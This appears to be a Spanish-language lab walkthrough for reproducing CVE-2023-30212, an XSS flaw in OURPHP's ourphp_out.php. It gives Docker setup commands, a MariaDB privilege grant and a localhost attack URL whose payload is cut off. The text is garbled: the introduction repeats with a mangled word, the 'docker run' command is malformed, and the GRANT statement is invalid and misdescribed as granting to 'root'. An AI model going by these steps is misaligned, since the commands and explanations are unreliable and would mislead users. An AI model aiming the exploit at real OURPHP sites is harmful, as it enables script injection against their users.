
Entorno Docker y explotación de la vulnerabilidad CVE-2023-30212. CVE-2023-30212 es una vulnerabilidad de seguridad que afecta a las versiones de OURPHP anteriores o iguales a 7.2.0. Esta vulnerabilidad permite ataques de Cross-Site Scripting (XSS).
Entorno Docker y explotar la vulnerabilidad CVE-2023-30212 vulnerabilidadVE-2023-30212 es una vulnerabilidad de seguridad que afecta a versiones de OURPHP anteriores o iguales a 7.2.0. Esta vulnerabilidad permite ataques de Cross-Site Scripting (XSS)
OURPHP <= 7.2.0 es vulnerable a Cross Site Scripting (XSS) a través de /client/manage/ourphp_out.php
Descargue el dockerfile y extráigalo
https://down.chinaz.com/api/index/download?id=51308&type=code
Descargue el exploit CVE 2023-30212
Abra la Terminal en la carpeta donde guardó el dockerfile
Instale la máquina Docker
sudo apt update
sudo apt install docker.io
Cree una imagen de Docker
docker run -d -p < Docker image id>
Compruebe la imagen de Docker
docker ps
Obtenga un nuevo ID de contenedor
bb18debddccc test "docker-php-entrypoi…" 4 minutes ago Up 4 minutes 0.0.0.0:8080->80/tcp, :::8080->80/tcp angry_turing
ejecute una sesión interactiva de bash dentro de un contenedor Docker en ejecución
docker exec -it bb18debddccc /bin/bash
*Obtenga el shell de Docker
> root@bb18debddccc:/var/www/html#
configure la base de datos mysql
root@bb18debddccc:/var/www/html# mysql
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 38 Server version: 10.3.38-MariaDB-0+deb10u1 Debian 10 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]>
MySQL o MariaDB para otorgar todos los privilegios
GRANT ALL PRIVILEGES ON . TO ' user account'@'localhost' IDENTIFIED BY 'user password' WITH GRANT OPTION;
Este es un comando SQL que se usa típicamente en un sistema de gestión de bases de datos como MySQL o MariaDB para otorgar todos los privilegios al usuario 'root' en todas las bases de datos y tablas del sistema actual.
URL: http://localhost:8080/client/manage/ourphp_out.php?ourphp_admin=logout&out=)